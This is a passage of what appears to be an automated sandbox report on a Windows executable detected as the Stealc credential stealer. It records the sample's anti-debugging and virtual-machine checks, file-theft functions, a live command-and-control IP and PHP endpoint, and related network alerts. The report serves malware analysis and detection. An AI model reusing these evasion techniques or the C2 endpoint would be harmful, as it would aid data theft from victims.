                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0396 second address: 4DA039C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA039C second address: 4DA03A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DE7D second address: 78DE82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78E042 second address: 78E046 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7AA846 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 79446A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 819AC0 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003938B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_003938B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00394910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00394910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0038DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0038DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0038E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0038E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0038ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0038ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00394570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00394570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0038DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0038DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0038BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0038BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0038F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0038F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00393EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00393EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003816D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003816D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00381160 GetSystemInfo,ExitProcess,0_2_00381160
                Source: file.exe, file.exe, 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1701295497.0000000000E65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                Source: file.exe, 00000000.00000002.1701295497.0000000000E77000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1701295497.0000000000E96000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1701295497.0000000000E1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13197
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13194
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13215
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13209
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13249
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003845C0 VirtualProtect ?,00000004,00000100,000000000_2_003845C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00399860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00399860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00399750 mov eax, dword ptr fs:[00000030h]0_2_00399750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00397850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00397850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7492, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00399600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00399600
                Source: file.exe, file.exe, 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 3Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00397B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00396920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00396920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00397850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00397850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00397A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00397A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.380000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1701295497.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1658803350.0000000004C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7492, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.380000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1701295497.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1658803350.0000000004C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7492, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.phpn17%VirustotalBrowse
                http://185.215.113.37/ws17%VirustotalBrowse
                http://185.215.113.37/G17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phpG17%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.phpnfile.exe, 00000000.00000002.1701295497.0000000000E77000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37/e2b1563c6670f193.php9Ufile.exe, 00000000.00000002.1701295497.0000000000E77000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37Ofile.exe, 00000000.00000002.1701295497.0000000000E1E000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37file.exe, 00000000.00000002.1701295497.0000000000E1E000.00000004.00000020.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    		unknown
                    http://185.215.113.37/.9file.exe, 00000000.00000002.1701295497.0000000000E1E000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/wsfile.exe, 00000000.00000002.1701295497.0000000000E77000.00000004.00000020.00020000.00000000.sdmptrueunknown
                      http://185.215.113.37/Gfile.exe, 00000000.00000002.1701295497.0000000000E77000.00000004.00000020.00020000.00000000.sdmptrueunknown
                      http://185.215.113.37/e2b1563c6670f193.php%Ufile.exe, 00000000.00000002.1701295497.0000000000E77000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37/e2b1563c6670f193.phpGfile.exe, 00000000.00000002.1701295497.0000000000E96000.00000004.00000020.00020000.00000000.sdmptrueunknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        185.215.113.37
                        		unknownPortugal
                        		206894WHOLESALECONNECTIONSNLtrue

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1523789
                        Start date and time:2024-10-02 03:10:06 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 2m 37s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:1
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@1/0@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 80%
                        • Number of executed functions: 19
                        • Number of non-executed functions: 84
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Stop behavior analysis, all processes terminated

                        Warnings

                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        185.215.113.37file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php

                        Domains

                        No context

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        No created / dropped files found

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.947320576471026
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:file.exe
                        File size:1'878'016 bytes
                        MD5:44397c793b2976c5571c32b11842e395
                        SHA1:d268ccdfb8eceb1f3ed0ccbb05f31b759528c0b7
                        SHA256:004cb0e8c07cc1b3f0613d1148d353c359ceffb8e2b27da445ed0eb11456b282
                        SHA512:b0f8eacb7045a7a79a1fcc17f1d181b6e3a17ad06fd5097920e6707a806c9f6fb70aa5397e7e2309b6a7f80593102fb34a54583adc5397d583b1612f67216829
                        SSDEEP:49152:OI0xvJVaKkL19qw8z+BDF0fV/HEkWa5ZWk:OIEMqw8iDFUfEkRZ/
                        TLSH:7E9533D21A128F1DFB443FB286B6D546157B0F1599C3F3FC4C32A4E96A2BB92439B405
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                        File Icon

                        Icon Hash:90cececece8e8eb0

                        Static PE Info

                        General

                        Entrypoint:0xaab000
                        Entrypoint Section:.taggant
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                        Entrypoint Preview

                        Instruction
                        jmp 00007F701CE1808Ah
                        jbe 00007F701CE180A2h
                        add byte ptr [eax], al
                        jmp 00007F701CE1A085h
                        add byte ptr [ebx], al
                        or al, byte ptr [eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], dh
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [ecx], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [ecx], al
                        add byte ptr [eax], 00000000h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        push es
                        or al, byte ptr [eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], dh
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [ecx], al
                        add byte ptr [eax], 00000000h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add ecx, dword ptr [edx]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        or ecx, dword ptr [edx]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        or al, 80h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add ecx, dword ptr [edx]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        xor byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add dword ptr [eax], eax
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add dword ptr [eax+00000000h], eax
                        add byte ptr [eax], al

                        Rich Headers

                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [LNK] VS2010 build 30319

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        0x10000x25b0000x2280038ba5dd174f68bafa0e3ee85e18196c0unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        0x25e0000x2a70000x200afd201fc1b4583ae7807301857bb1476unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        xspzzdod0x5050000x1a50000x1a460072f397057ba1861aac812bed604ccc08False0.99486077813708OpenPGP Public Key7.952856014840197IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        ngzkmgsa0x6aa0000x10000x4006a5530d7d26890d8ad0cafbfe0aa0baaFalse0.77734375data6.09879566064824IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .taggant0x6ab0000x30000x2200a33d7d43d03ef404fe88227b1b19d0d9False0.05951286764705882DOS executable (COM)0.7174442702629957IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                        Imports

                        DLLImport
                        kernel32.dlllstrcpy

                        Network Behavior

                        Suricata IDS Alerts

                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-10-02T03:10:59.743753+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.3780TCP

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Oct 2, 2024 03:10:58.785684109 CEST4973080192.168.2.4185.215.113.37
                        Oct 2, 2024 03:10:58.790647030 CEST8049730185.215.113.37192.168.2.4
                        Oct 2, 2024 03:10:58.790747881 CEST4973080192.168.2.4185.215.113.37
                        Oct 2, 2024 03:10:58.790890932 CEST4973080192.168.2.4185.215.113.37
                        Oct 2, 2024 03:10:58.795619011 CEST8049730185.215.113.37192.168.2.4
                        Oct 2, 2024 03:10:59.517076969 CEST8049730185.215.113.37192.168.2.4
                        Oct 2, 2024 03:10:59.517429113 CEST4973080192.168.2.4185.215.113.37
